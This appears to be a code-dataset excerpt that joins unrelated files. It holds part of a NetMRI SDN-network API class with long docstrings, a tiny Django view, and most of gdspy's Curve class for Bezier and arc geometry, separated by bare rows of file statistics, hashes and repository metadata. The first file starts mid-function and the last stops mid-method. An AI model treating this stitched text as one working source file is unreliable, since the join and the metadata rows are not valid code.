"""Lists the available sdn networks matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: EndTime, StartTime, fabric_id, sdn_network_id, sdn_network_key, sdn_network_name, virtual_network_id.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_EndTime: The operator to apply to the field EndTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. EndTime: The ending date/time of this network For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_EndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_EndTime: If op_EndTime is specified, the field named in this input will be compared to the value in EndTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_EndTime must be specified if op_EndTime is specified.
:type val_f_EndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_EndTime: If op_EndTime is specified, this value will be compared to the value in EndTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_EndTime must be specified if op_EndTime is specified.
:type val_c_EndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StartTime: The operator to apply to the field StartTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StartTime: The starting date/time of this network For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StartTime: If op_StartTime is specified, the field named in this input will be compared to the value in StartTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StartTime must be specified if op_StartTime is specified.
:type val_f_StartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StartTime: If op_StartTime is specified, this value will be compared to the value in StartTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StartTime must be specified if op_StartTime is specified.
:type val_c_StartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_fabric_handle: The operator to apply to the field fabric_handle. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. fabric_handle: Name of SDN controller from which this network was collected. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_fabric_handle: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_fabric_handle: If op_fabric_handle is specified, the field named in this input will be compared to the value in fabric_handle using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_fabric_handle must be specified if op_fabric_handle is specified.
:type val_f_fabric_handle: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_fabric_handle: If op_fabric_handle is specified, this value will be compared to the value in fabric_handle using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_fabric_handle must be specified if op_fabric_handle is specified.
:type val_c_fabric_handle: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_fabric_id: The operator to apply to the field fabric_id. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. fabric_id: Identifier of SdnSetting from which this network was collected For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_fabric_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_fabric_id: If op_fabric_id is specified, the field named in this input will be compared to the value in fabric_id using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_fabric_id must be specified if op_fabric_id is specified.
:type val_f_fabric_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_fabric_id: If op_fabric_id is specified, this value will be compared to the value in fabric_id using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_fabric_id must be specified if op_fabric_id is specified.
:type val_c_fabric_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_sdn_network_id: The operator to apply to the field sdn_network_id. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. sdn_network_id: The internal NetMRI identifier for this network For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_sdn_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_sdn_network_id: If op_sdn_network_id is specified, the field named in this input will be compared to the value in sdn_network_id using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_sdn_network_id must be specified if op_sdn_network_id is specified.
:type val_f_sdn_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_sdn_network_id: If op_sdn_network_id is specified, this value will be compared to the value in sdn_network_id using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_sdn_network_id must be specified if op_sdn_network_id is specified.
:type val_c_sdn_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_sdn_network_key: The operator to apply to the field sdn_network_key. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. sdn_network_key: The unique identifier of each network at the SDN controller side For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_sdn_network_key: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_sdn_network_key: If op_sdn_network_key is specified, the field named in this input will be compared to the value in sdn_network_key using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_sdn_network_key must be specified if op_sdn_network_key is specified.
:type val_f_sdn_network_key: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_sdn_network_key: If op_sdn_network_key is specified, this value will be compared to the value in sdn_network_key using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_sdn_network_key must be specified if op_sdn_network_key is specified.
:type val_c_sdn_network_key: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_sdn_network_name: The operator to apply to the field sdn_network_name. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. sdn_network_name: Name of SDN network For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_sdn_network_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_sdn_network_name: If op_sdn_network_name is specified, the field named in this input will be compared to the value in sdn_network_name using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_sdn_network_name must be specified if op_sdn_network_name is specified.
:type val_f_sdn_network_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_sdn_network_name: If op_sdn_network_name is specified, this value will be compared to the value in sdn_network_name using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_sdn_network_name must be specified if op_sdn_network_name is specified.
:type val_c_sdn_network_name: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_virtual_network_id: The operator to apply to the field virtual_network_id. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. virtual_network_id: ID of Virtual Network which is assigned to this network For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_virtual_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_virtual_network_id: If op_virtual_network_id is specified, the field named in this input will be compared to the value in virtual_network_id using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_virtual_network_id must be specified if op_virtual_network_id is specified.
:type val_f_virtual_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_virtual_network_id: If op_virtual_network_id is specified, this value will be compared to the value in virtual_network_id using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_virtual_network_id must be specified if op_virtual_network_id is specified.
:type val_c_virtual_network_id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of sdn network methods. The listed methods will be called on each sdn network returned and included in the output. Available methods are: fabric_handle.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` sdn_network_id
:param sort: The data field(s) to use for sorting the output. Default is sdn_network_id. Valid values are sdn_network_id, sdn_network_key, sdn_network_name, fabric_id, virtual_network_id, StartTime, EndTime.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each SdnNetwork. Valid values are sdn_network_id, sdn_network_key, sdn_network_name, fabric_id, virtual_network_id, StartTime, EndTime. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return sdn_networks: An array of the SdnNetwork objects that match the specified input criteria.
:rtype sdn_networks: Array of SdnNetwork
"""
return self.api_list_request(self._get_method_fullname("find"), kwargs)
def show(self, **kwargs):
"""Shows the details for the specified sdn network.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param sdn_network_id: The internal NetMRI identifier for this network
:type sdn_network_id: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of sdn network methods. The listed methods will be called on each sdn network returned and included in the output. Available methods are: fabric_handle.
:type methods: Array of String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return sdn_network: The sdn network identified by the specified sdn_network_id.
:rtype sdn_network: SdnNetwork
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
| 52.886248
| 511
| 0.611685
| 4,125
| 31,150
| 4.50497
| 0.062303
| 0.071033
| 0.046171
| 0.060378
| 0.922994
| 0.921272
| 0.916321
| 0.909057
| 0.894635
| 0.886778
| 0
| 0.004498
| 0.30764
| 31,150
| 589
| 512
| 52.886248
| 0.857143
| 0.81923
| 0
| 0
| 0
| 0
| 0.043847
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.363636
| false
| 0
| 0.090909
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fa1be20499b0c2d83b7d14122d502f70c10a238e
| 166
|
py
|
Python
|
ai_coin_identifier/views.py
|
JohnGWebDev/coinloggr
|
36a6065b1a8f8582cc5b24917a2f89bca2dcc14b
|
[
"BSD-3-Clause"
] | null | null | null |
ai_coin_identifier/views.py
|
JohnGWebDev/coinloggr
|
36a6065b1a8f8582cc5b24917a2f89bca2dcc14b
|
[
"BSD-3-Clause"
] | 1
|
2022-01-10T16:50:44.000Z
|
2022-01-10T16:50:44.000Z
|
ai_coin_identifier/views.py
|
JohnGWebDev/coinloggr
|
36a6065b1a8f8582cc5b24917a2f89bca2dcc14b
|
[
"BSD-3-Clause"
] | null | null | null |
from django.shortcuts import render
# Create your views here.
def ai_coin_identifier_home_page(request):
return render(request, 'ai_coin_identifier/index.html')
| 27.666667
| 59
| 0.807229
| 24
| 166
| 5.333333
| 0.791667
| 0.09375
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114458
| 166
| 6
| 59
| 27.666667
| 0.870748
| 0.138554
| 0
| 0
| 0
| 0
| 0.204225
| 0.204225
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
fa2917be92ab8a53c6a854e4f886527710bd95c9
| 30,824
|
py
|
Python
|
gdspy/curve.py
|
leviathanch/gdspy
|
d440538fa9d1e0f58a7cdc77471f5fe2408e6fea
|
[
"BSL-1.0"
] | 1
|
2020-01-06T23:15:28.000Z
|
2020-01-06T23:15:28.000Z
|
gdspy/curve.py
|
leviathanch/gdspy
|
d440538fa9d1e0f58a7cdc77471f5fe2408e6fea
|
[
"BSL-1.0"
] | null | null | null |
gdspy/curve.py
|
leviathanch/gdspy
|
d440538fa9d1e0f58a7cdc77471f5fe2408e6fea
|
[
"BSL-1.0"
] | null | null | null |
######################################################################
# #
# Copyright 2009-2019 Lucas Heitzmann Gabrielli. #
# This file is part of gdspy, distributed under the terms of the #
# Boost Software License - Version 1.0. See the accompanying #
# LICENSE file or <http://www.boost.org/LICENSE_1_0.txt> #
# #
######################################################################
"""
Curve class.
"""
import numpy
from gdspy import _func_bezier, _hobby, _zero
class Curve(object):
"""
Generation of curves loosely based on SVG paths.
Short summary of available methods:
====== =============================
Method Primitive
====== =============================
L/l Line segments
H/h Horizontal line segments
V/v Vertical line segments
C/c Cubic Bezier curve
S/s Smooth cubic Bezier curve
Q/q Quadratic Bezier curve
T/t Smooth quadratic Bezier curve
B/b General degree Bezier curve
I/i Smooth interpolating curve
arc Elliptical arc
====== =============================
The uppercase version of the methods considers that all coordinates
are absolute, whereas the lowercase considers that they are relative
to the current end point of the curve.
Parameters
----------
x : number
X-coordinate of the starting point of the curve. If this is a
complex number, the value of `y` is ignored and the starting
point becomes ``(x.real, x.imag)``.
y : number
Y-coordinate of the starting point of the curve.
tolerance : number
Tolerance used to calculate a polygonal approximation to the
curve.
Notes
-----
In all methods of this class that accept coordinate pairs, a single
complex number can be passed to be split into its real and imaginary
parts.
This feature can be useful in expressing coordinates in polar form.
All commands follow the SVG 2 specification, except for elliptical
arcs and smooth interpolating curves, which are inspired by the
Metapost syntax.
Examples
--------
>>> curve = gdspy.Curve(3, 4).H(1).q(0.5, 1, 2j).L(2 + 3j, 2, 2)
>>> pol = gdspy.Polygon(curve.get_points())
"""
__slots__ = "points", "tol", "last_c", "last_q"
def __init__(self, x, y=0, tolerance=0.01):
self.last_c = self.last_q = None
self.tol = tolerance ** 2
if isinstance(x, complex):
self.points = [numpy.array((x.real, x.imag))]
else:
self.points = [numpy.array((x, y))]
def get_points(self):
"""
Get the polygonal points that approximate this curve.
Returns
-------
out : Numpy array[N, 2]
Vertices of the polygon.
"""
delta = (self.points[-1] - self.points[0]) ** 2
if delta[0] + delta[1] < self.tol:
return numpy.array(self.points[:-1])
return numpy.array(self.points)
def L(self, *xy):
"""
Add straight line segments to the curve.
Parameters
----------
xy : numbers
Endpoint coordinates of the line segments.
Returns
-------
out : `Curve`
This curve.
"""
self.last_c = self.last_q = None
i = 0
while i < len(xy):
if isinstance(xy[i], complex):
self.points.append(numpy.array((xy[i].real, xy[i].imag)))
i += 1
else:
self.points.append(numpy.array((xy[i], xy[i + 1])))
i += 2
return self
def l(self, *xy):
"""
Add straight line segments to the curve.
Parameters
----------
xy : numbers
Endpoint coordinates of the line segments relative to the
current end point.
Returns
-------
out : `Curve`
This curve.
"""
self.last_c = self.last_q = None
o = self.points[-1]
i = 0
while i < len(xy):
if isinstance(xy[i], complex):
self.points.append(o + numpy.array((xy[i].real, xy[i].imag)))
i += 1
else:
self.points.append(o + numpy.array((xy[i], xy[i + 1])))
i += 2
return self
def H(self, *x):
"""
Add horizontal line segments to the curve.
Parameters
----------
x : numbers
Endpoint x-coordinates of the line segments.
Returns
-------
out : `Curve`
This curve.
"""
self.last_c = self.last_q = None
y0 = self.points[-1][1]
self.points.extend(numpy.array((xx, y0)) for xx in x)
return self
def h(self, *x):
"""
Add horizontal line segments to the curve.
Parameters
----------
x : numbers
Endpoint x-coordinates of the line segments relative to the
current end point.
Returns
-------
out : `Curve`
This curve.
"""
self.last_c = self.last_q = None
x0, y0 = self.points[-1]
self.points.extend(numpy.array((x0 + xx, y0)) for xx in x)
return self
def V(self, *y):
"""
Add vertical line segments to the curve.
Parameters
----------
y : numbers
Endpoint y-coordinates of the line segments.
Returns
-------
out : `Curve`
This curve.
"""
self.last_c = self.last_q = None
x0 = self.points[-1][0]
self.points.extend(numpy.array((x0, yy)) for yy in y)
return self
def v(self, *y):
"""
Add vertical line segments to the curve.
Parameters
----------
y : numbers
Endpoint y-coordinates of the line segments relative to the
current end point.
Returns
-------
out : `Curve`
This curve.
"""
self.last_c = self.last_q = None
x0, y0 = self.points[-1]
self.points.extend(numpy.array((x0, y0 + yy)) for yy in y)
return self
def arc(self, radius, initial_angle, final_angle, rotation=0):
"""
Add an elliptical arc to the curve.
Parameters
----------
radius : number, array-like[2]
Arc radius. An elliptical arc can be created by passing an
array with 2 radii.
initial_angle : number
Initial angle of the arc (in *radians*).
final_angle : number
Final angle of the arc (in *radians*).
rotation : number
Rotation of the axis of the ellipse.
Returns
-------
out : `Curve`
This curve.
"""
self.last_c = self.last_q = None
if hasattr(radius, "__iter__"):
rx, ry = radius
radius = max(radius)
else:
rx = ry = radius
full_angle = abs(final_angle - initial_angle)
number_of_points = max(
3,
1
+ int(0.5 * full_angle / numpy.arccos(1 - self.tol ** 0.5 / radius) + 0.5),
)
angles = numpy.linspace(
initial_angle - rotation, final_angle - rotation, number_of_points
)
pts = numpy.vstack((rx * numpy.cos(angles), ry * numpy.sin(angles))).T
if rotation != 0:
rot = numpy.empty_like(pts)
c = numpy.cos(rotation)
s = numpy.sin(rotation)
rot[:, 0] = pts[:, 0] * c - pts[:, 1] * s
rot[:, 1] = pts[:, 0] * s + pts[:, 1] * c
else:
rot = pts
pts = rot[1:] - rot[0] + self.points[-1]
self.points.extend(xy for xy in pts)
return self
def C(self, *xy):
"""
Add cubic Bezier curves to the curve.
Parameters
----------
xy : numbers
Coordinate pairs. Each set of 3 pairs are interpreted as
the control point at the beginning of the curve, the control
point at the end of the curve and the endpoint of the curve.
Returns
-------
out : `Curve`
This curve.
"""
self.last_q = None
i = 0
while i < len(xy):
ctrl = numpy.empty((4, 2))
ctrl[0] = self.points[-1]
for j in range(1, 4):
if isinstance(xy[i], complex):
ctrl[j, 0] = xy[i].real
ctrl[j, 1] = xy[i].imag
i += 1
else:
ctrl[j, 0] = xy[i]
ctrl[j, 1] = xy[i + 1]
i += 2
f = _func_bezier(ctrl)
uu = [0, 0.2, 0.5, 0.8, 1]
fu = [f(u) for u in uu]
iu = 1
while iu < len(fu):
test_u = 0.5 * (uu[iu - 1] + uu[iu])
test_pt = f(test_u)
test_err = 0.5 * (fu[iu - 1] + fu[iu]) - test_pt
if test_err[0] ** 2 + test_err[1] ** 2 > self.tol:
uu.insert(iu, test_u)
fu.insert(iu, test_pt)
else:
iu += 1
self.points.extend(xy for xy in fu[1:])
self.last_c = ctrl[2]
return self
def c(self, *xy):
"""
Add cubic Bezier curves to the curve.
Parameters
----------
xy : numbers
Coordinate pairs. Each set of 3 pairs are interpreted as
the control point at the beginning of the curve, the control
point at the end of the curve and the endpoint of the curve.
All coordinates are relative to the current end point.
Returns
-------
out : `Curve`
This curve.
"""
self.last_q = None
x0, y0 = self.points[-1]
i = 0
while i < len(xy):
ctrl = numpy.empty((4, 2))
ctrl[0, 0] = x0
ctrl[0, 1] = y0
for j in range(1, 4):
if isinstance(xy[i], complex):
ctrl[j, 0] = x0 + xy[i].real
ctrl[j, 1] = y0 + xy[i].imag
i += 1
else:
ctrl[j, 0] = x0 + xy[i]
ctrl[j, 1] = y0 + xy[i + 1]
i += 2
f = _func_bezier(ctrl)
uu = [0, 0.2, 0.5, 0.8, 1]
fu = [f(u) for u in uu]
iu = 1
while iu < len(fu):
test_u = 0.5 * (uu[iu - 1] + uu[iu])
test_pt = f(test_u)
test_err = 0.5 * (fu[iu - 1] + fu[iu]) - test_pt
if test_err[0] ** 2 + test_err[1] ** 2 > self.tol:
uu.insert(iu, test_u)
fu.insert(iu, test_pt)
else:
iu += 1
self.points.extend(xy for xy in fu[1:])
self.last_c = ctrl[2]
return self
def S(self, *xy):
"""
Add smooth cubic Bezier curves to the curve.
Parameters
----------
xy : numbers
Coordinate pairs. Each set of 2 pairs are interpreted as
the control point at the end of the curve and the endpoint
of the curve. The control point at the beginning of the
curve is assumed to be the reflection of the control point
at the end of the last curve relative to the starting point
of the curve. If the previous curve is not a cubic Bezier,
the control point is coincident with the starting point.
Returns
-------
out : `Curve`
This curve.
"""
self.last_q = None
if self.last_c is None:
self.last_c = self.points[-1]
i = 0
while i < len(xy):
ctrl = numpy.empty((4, 2))
ctrl[0] = self.points[-1]
ctrl[1] = 2 * ctrl[0] - self.last_c
for j in range(2, 4):
if isinstance(xy[i], complex):
ctrl[j, 0] = xy[i].real
ctrl[j, 1] = xy[i].imag
i += 1
else:
ctrl[j, 0] = xy[i]
ctrl[j, 1] = xy[i + 1]
i += 2
f = _func_bezier(ctrl)
uu = [0, 0.2, 0.5, 0.8, 1]
fu = [f(u) for u in uu]
iu = 1
while iu < len(fu):
test_u = 0.5 * (uu[iu - 1] + uu[iu])
test_pt = f(test_u)
test_err = 0.5 * (fu[iu - 1] + fu[iu]) - test_pt
if test_err[0] ** 2 + test_err[1] ** 2 > self.tol:
uu.insert(iu, test_u)
fu.insert(iu, test_pt)
else:
iu += 1
self.points.extend(xy for xy in fu[1:])
self.last_c = ctrl[2]
return self
def s(self, *xy):
"""
Add smooth cubic Bezier curves to the curve.
Parameters
----------
xy : numbers
Coordinate pairs. Each set of 2 pairs are interpreted as
the control point at the end of the curve and the endpoint
of the curve. The control point at the beginning of the
curve is assumed to be the reflection of the control point
at the end of the last curve relative to the starting point
of the curve. If the previous curve is not a cubic Bezier,
the control point is coincident with the starting point.
All coordinates are relative to the current end point.
Returns
-------
out : `Curve`
This curve.
"""
self.last_q = None
if self.last_c is None:
self.last_c = self.points[-1]
x0, y0 = self.points[-1]
i = 0
while i < len(xy):
ctrl = numpy.empty((4, 2))
ctrl[0, 0] = x0
ctrl[0, 1] = y0
ctrl[1] = 2 * ctrl[0] - self.last_c
for j in range(2, 4):
if isinstance(xy[i], complex):
ctrl[j, 0] = x0 + xy[i].real
ctrl[j, 1] = y0 + xy[i].imag
i += 1
else:
ctrl[j, 0] = x0 + xy[i]
ctrl[j, 1] = y0 + xy[i + 1]
i += 2
f = _func_bezier(ctrl)
uu = [0, 0.2, 0.5, 0.8, 1]
fu = [f(u) for u in uu]
iu = 1
while iu < len(fu):
test_u = 0.5 * (uu[iu - 1] + uu[iu])
test_pt = f(test_u)
test_err = 0.5 * (fu[iu - 1] + fu[iu]) - test_pt
if test_err[0] ** 2 + test_err[1] ** 2 > self.tol:
uu.insert(iu, test_u)
fu.insert(iu, test_pt)
else:
iu += 1
self.points.extend(xy for xy in fu[1:])
self.last_c = ctrl[2]
return self
def Q(self, *xy):
"""
Add quadratic Bezier curves to the curve.
Parameters
----------
xy : numbers
Coordinate pairs. Each set of 2 pairs are interpreted as
the control point and the endpoint of the curve.
Returns
-------
out : `Curve`
This curve.
"""
self.last_c = None
i = 0
while i < len(xy):
ctrl = numpy.empty((3, 2))
ctrl[0] = self.points[-1]
for j in range(1, 3):
if isinstance(xy[i], complex):
ctrl[j, 0] = xy[i].real
ctrl[j, 1] = xy[i].imag
i += 1
else:
ctrl[j, 0] = xy[i]
ctrl[j, 1] = xy[i + 1]
i += 2
f = _func_bezier(ctrl)
uu = [0, 0.2, 0.5, 0.8, 1]
fu = [f(u) for u in uu]
iu = 1
while iu < len(fu):
test_u = 0.5 * (uu[iu - 1] + uu[iu])
test_pt = f(test_u)
test_err = 0.5 * (fu[iu - 1] + fu[iu]) - test_pt
if test_err[0] ** 2 + test_err[1] ** 2 > self.tol:
uu.insert(iu, test_u)
fu.insert(iu, test_pt)
else:
iu += 1
self.points.extend(xy for xy in fu[1:])
self.last_q = ctrl[1]
return self
def q(self, *xy):
"""
Add quadratic Bezier curves to the curve.
Parameters
----------
xy : numbers
Coordinate pairs. Each set of 2 pairs are interpreted as
the control point and the endpoint of the curve.
All coordinates are relative to the current end point.
Returns
-------
out : `Curve`
This curve.
"""
self.last_c = None
x0, y0 = self.points[-1]
i = 0
while i < len(xy):
ctrl = numpy.empty((3, 2))
ctrl[0, 0] = x0
ctrl[0, 1] = y0
for j in range(1, 3):
if isinstance(xy[i], complex):
ctrl[j, 0] = x0 + xy[i].real
ctrl[j, 1] = y0 + xy[i].imag
i += 1
else:
ctrl[j, 0] = x0 + xy[i]
ctrl[j, 1] = y0 + xy[i + 1]
i += 2
f = _func_bezier(ctrl)
uu = [0, 0.2, 0.5, 0.8, 1]
fu = [f(u) for u in uu]
iu = 1
while iu < len(fu):
test_u = 0.5 * (uu[iu - 1] + uu[iu])
test_pt = f(test_u)
test_err = 0.5 * (fu[iu - 1] + fu[iu]) - test_pt
if test_err[0] ** 2 + test_err[1] ** 2 > self.tol:
uu.insert(iu, test_u)
fu.insert(iu, test_pt)
else:
iu += 1
self.points.extend(xy for xy in fu[1:])
self.last_q = ctrl[1]
return self
def T(self, *xy):
"""
Add smooth quadratic Bezier curves to the curve.
Parameters
----------
xy : numbers
Coordinates of the endpoints of the curves. The control
point is assumed to be the reflection of the control point
of the last curve relative to the starting point of the
curve. If the previous curve is not a quadratic Bezier,
the control point is coincident with the starting point.
Returns
-------
out : `Curve`
This curve.
"""
self.last_c = None
if self.last_q is None:
self.last_q = self.points[-1]
i = 0
while i < len(xy):
ctrl = numpy.empty((3, 2))
ctrl[0] = self.points[-1]
ctrl[1] = 2 * ctrl[0] - self.last_q
if isinstance(xy[i], complex):
ctrl[2, 0] = xy[i].real
ctrl[2, 1] = xy[i].imag
i += 1
else:
ctrl[2, 0] = xy[i]
ctrl[2, 1] = xy[i + 1]
i += 2
f = _func_bezier(ctrl)
uu = [0, 0.2, 0.5, 0.8, 1]
fu = [f(u) for u in uu]
iu = 1
while iu < len(fu):
test_u = 0.5 * (uu[iu - 1] + uu[iu])
test_pt = f(test_u)
test_err = 0.5 * (fu[iu - 1] + fu[iu]) - test_pt
if test_err[0] ** 2 + test_err[1] ** 2 > self.tol:
uu.insert(iu, test_u)
fu.insert(iu, test_pt)
else:
iu += 1
self.points.extend(xy for xy in fu[1:])
self.last_q = ctrl[1]
return self
def t(self, *xy):
"""
Add smooth quadratic Bezier curves to the curve.
Parameters
----------
xy : numbers
Coordinates of the endpoints of the curves. The control
point is assumed to be the reflection of the control point
of the last curve relative to the starting point of the
curve. If the previous curve is not a quadratic Bezier,
the control point is coincident with the starting point.
All coordinates are relative to the current end point.
Returns
-------
out : `Curve`
This curve.
"""
self.last_c = None
if self.last_q is None:
self.last_q = self.points[-1]
x0, y0 = self.points[-1]
i = 0
while i < len(xy):
ctrl = numpy.empty((3, 2))
ctrl[0, 0] = x0
ctrl[0, 1] = y0
ctrl[1] = 2 * ctrl[0] - self.last_q
if isinstance(xy[i], complex):
ctrl[2, 0] = x0 + xy[i].real
ctrl[2, 1] = y0 + xy[i].imag
i += 1
else:
ctrl[2, 0] = x0 + xy[i]
ctrl[2, 1] = y0 + xy[i + 1]
i += 2
f = _func_bezier(ctrl)
uu = [0, 0.2, 0.5, 0.8, 1]
fu = [f(u) for u in uu]
iu = 1
while iu < len(fu):
test_u = 0.5 * (uu[iu - 1] + uu[iu])
test_pt = f(test_u)
test_err = 0.5 * (fu[iu - 1] + fu[iu]) - test_pt
if test_err[0] ** 2 + test_err[1] ** 2 > self.tol:
uu.insert(iu, test_u)
fu.insert(iu, test_pt)
else:
iu += 1
self.points.extend(xy for xy in fu[1:])
self.last_q = ctrl[1]
return self
def B(self, *xy):
"""
Add a general degree Bezier curve.
Parameters
----------
xy : numbers
Coordinate pairs. The last coordinate is the endpoint of
curve and all other are control points.
Returns
-------
out : `Curve`
This curve.
"""
self.last_c = self.last_q = None
i = 0
ctrl = [self.points[-1]]
while i < len(xy):
if isinstance(xy[i], complex):
ctrl.append((xy[i].real, xy[i].imag))
i += 1
else:
ctrl.append((xy[i], xy[i + 1]))
i += 2
ctrl = numpy.array(ctrl)
